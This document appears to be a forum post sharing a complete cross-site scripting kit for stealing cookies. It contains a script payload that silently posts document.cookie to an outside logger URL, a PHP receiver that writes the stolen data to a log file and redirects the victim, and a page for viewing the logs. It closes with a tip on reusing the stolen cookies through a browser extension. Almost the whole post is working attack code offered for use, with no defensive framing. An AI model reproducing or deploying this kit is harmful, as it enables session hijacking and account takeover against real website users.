XSS CODE:
Code: Select all
<script>document.write('<form method=post action="http://example.com/logger.php" style="display:none;"><textarea name=data>', document.cookie, '</textarea><input type=submit id="submit"/></form>');document.getElementById('submit').click();</script>
Code: Select all
<?PHP
if (isset($_REQUEST['data'])) {
$data = $_REQUEST['data'];
$url = "http://www.google.com/"; //URL to redirect to after stealing shit.
$log = fopen("xsslog.html", "a+");
fwrite($log, $data."<br>\r\n<br>\r\n");
fclose($log);
header("Location: ".$url);
}
?>
Code: Select all
<style>* {background: #080808; color: #009900; font-family: "Courier New", Courier, "Lucida Sans Typewriter", "Lucida Typewriter", monospace;}</style>
<h1>XSS C00KIE L0GS</h1>
In order to use stolen cookies, you'll need to find a browser extension that lets you do so.